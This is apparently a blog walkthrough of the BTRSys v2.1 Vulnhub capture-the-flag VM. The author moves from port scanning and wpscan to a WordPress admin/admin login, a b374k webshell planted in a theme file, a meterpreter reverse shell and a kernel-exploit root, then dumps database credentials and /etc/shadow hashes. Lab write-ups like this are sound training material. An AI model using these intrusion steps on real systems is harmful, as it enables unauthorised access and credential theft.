OK one last Vulnhub VM for today, this time is the second in the series: Resimler: BTRSys v2.1, This one is a bit more difficult than the previous, but only marginally.
Getting this VM up and running is a pain, first time I tried to import it in vmware it complained about the vmdk, it’s a simple fix, the name is wrong in the .ova, simply open it in a text editor and rename the file it is looking for to the correct one.
First things first, a portscan.. we get the following:
21 – vsftpd 3.0.3
22 – OpenSSH 7.2p2 Ubuntu 4ubuntu2.1
80 – Apache httpd 2.4.18
Again FTP allows anonymous login but nothing there.
Loading the webapp in a browser we are greeted with a gif of a snake but not much else. Examining robots.txt gives us /wordpress/.
So I kick off the usual tools, wpscan, nikto and dirb (with seclists big.txt).
Nikto doesn’t give much useful information, and the best dirb gives is /upload/ which simply reply’s with:
Connection failed: SQLSTATE[HY000] [1049] Unknown database ‘Lepton’
WPscan however lists a whole host of issues, here is a snippet of what I found:
[!] The WordPress 'http://192.168.1.144/wordpress/readme.html' file exists exposing a version number[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)[+] XML-RPC Interface available under: http://192.168.1.144/wordpress/xmlrpc.php[!] Upload directory has directory listing enabled: http://192.168.1.144/wordpress/wp-content/uploads/[!] Includes directory has directory listing enabled: http://192.168.1.144/wordpress/wp-includes/[+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers- loads of vulns as old version -[+] Identified the following 2 user/s: +----+--------+--------+ | Id | Login | Name | +----+--------+--------+ | 1 | btrisk | btrisk | | 2 | admin | admin | +----+--------+--------+ |
I try both usernames with the username as the password and log in with the username/password of admin/admin. That was surprisingly easy!
Once in I used the “edit themes” option to edit “content-audio.php” to contain the b374k php webshell. I visited the url in a browser and was greeted with a webshell. from there I pulled the wp-config.php
define('DB_NAME', 'wordpress');define('DB_USER', 'root');define('DB_PASSWORD', 'rootpassword!');define('DB_HOST', 'localhost'); |
And /etc/password file which turned out to ultimately be no use. After realizing that python wasn’t installed I uploaded LinEnum.sh to /tmp, chmoded it and ran to get the following:
Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4)DISTRIB_ID=UbuntuDISTRIB_RELEASE=16.04DISTRIB_CODENAME=xenialDISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS" |
Running out of ideas I uploaded a meterpreter reverse shell and launched. from there I could spawn a shell using: /usr/bin/python3.5 -c ‘import pty; pty.spawn(“/bin/sh”)’
There didn’t seem to be any suid binaries to exploit so I did a quick google for kernal exploits which led me to: https://www.exploit-db.com/exploits/41458/
The machine didn’t have GCC installed and the version I did find on it I didn’t have permissions to use. So compile that locally, upload. Then ran the following:
$ chmod +x pwnchmod +x pwn$ ./pwn./pwn[.] namespace sandbox setup successfully[.] disabling SMEP & SMAP[.] scheduling 0xffffffff81064550(0x406e0)[.] waiting for the timer to execute[.] done[.] SMEP & SMAP should be off now[.] getting root[.] executing 0x55e02688defd[.] done[.] should be root now[.] checking if we got root[+] got r00t ^_^[!] don't kill the exploit binary, the kernel will crashroot@ubuntu:/tmp# |
And that is game over 
Again there was no flag in /root so I grabbed the shadow files as proof. I haven’t cracked the hashes as I don’t see the point already having a root shell.
root@ubuntu:/root# ls -lals -latotal 32drwx------ 4 root root 4096 Apr 28 02:24 .drwxr-xr-x 22 root root 4096 Mar 17 2017 ..-rw------- 1 root root 505 May 2 08:57 .bash_history-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrcdrwx------ 2 root root 4096 Apr 28 02:24 .cache-rw------- 1 root root 215 Apr 27 12:11 .mysql_historydrwxr-xr-x 2 root root 4096 Mar 21 2017 .nano-rw-r--r-- 1 root root 148 Aug 17 2015 .profileroot@ubuntu:/root# cat /etc/shadowcat /etc/shadowroot:$6$pYiSm10w$A7g2nH1EXRcIZxLgE3gRR.F.Rlq0gSpyWMqQjD/19U4s2xjtbNsiw.PV1Fevp23QOOj5tEm8CFGqagoodunMG.:17284:0:99999:7:::daemon:*:17212:0:99999:7:::bin:*:17212:0:99999:7:::sys:*:17212:0:99999:7:::sync:*:17212:0:99999:7:::games:*:17212:0:99999:7:::man:*:17212:0:99999:7:::lp:*:17212:0:99999:7:::mail:*:17212:0:99999:7:::news:*:17212:0:99999:7:::uucp:*:17212:0:99999:7:::proxy:*:17212:0:99999:7:::www-data:$6$reqtjqmt$mDDXv45UPmRm7bwQYICkDFiVvGTLGaJyX.w16Sg7PNY9xMwlhIwebUSgF0hGjgKo1ku9IyfX0YdqDQHhBELZ2.:17283:0:99999:7:::backup:*:17212:0:99999:7:::list:*:17212:0:99999:7:::irc:*:17212:0:99999:7:::gnats:*:17212:0:99999:7:::nobody:*:17212:0:99999:7:::systemd-timesync:*:17212:0:99999:7:::systemd-network:*:17212:0:99999:7:::systemd-resolve:*:17212:0:99999:7:::systemd-bus-proxy:*:17212:0:99999:7:::syslog:*:17212:0:99999:7:::_apt:*:17212:0:99999:7:::messagebus:*:17242:0:99999:7:::uuidd:*:17242:0:99999:7:::btrisk:$6$pR7v.zmh$RGoeByixIOkiz8haCi3nFN2l8VtT/VjPJo6nO1jmpKdBbHcL6FMdb09Uq51sjY0M/HVZ8xF9lNjAHEoe1jAzn.:17284:0:99999:7:::mysql:!:17242:0:99999:7:::ftp:*:17245:0:99999:7:::sshd:*:17246:0:99999:7::: |
Thanks for another fun Boot2Root @ismailonderkaya